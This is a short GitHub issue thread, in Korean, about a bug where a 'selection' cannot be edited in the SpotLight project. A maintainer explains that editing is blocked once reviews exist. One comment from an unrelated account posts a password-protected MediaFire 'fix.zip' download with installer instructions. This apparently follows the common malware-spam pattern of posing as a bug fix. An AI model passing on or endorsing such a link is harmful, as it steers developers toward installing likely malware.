### ISSUE TITLE
[BUG] : 셀렉션 수정 x 

### ISSUE THREAD

**Issue by Wongilk** [Programmers-SpotLight/SpotLight#269]
## ✨ 버그 설명

수정이 안됩니다
![x-ezgif com-video-to-gif-converter (2)](https://github.com/user-attachments/assets/c857e9dc-366b-4506-9b44-ad3b9351f2b5)

## ✅  예상 해결 방안 

- [ ] 작업 1
- [ ] 작업 2
- [ ] 작업 3

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 7jw92nVd1kLaq1** [comment]
흠, 혹시 이미 셀렉션에 리뷰가 달려있으면 수정을 할 수 없도록 만들었습니다. 그냥 페이지 자체를 접근하지 못하도록 엔드포인트를 수정하겠습니다!

**Comment by Wongilk** [comment]
제가 그 부분을 간과하고 있었네요 알겠습니다~!
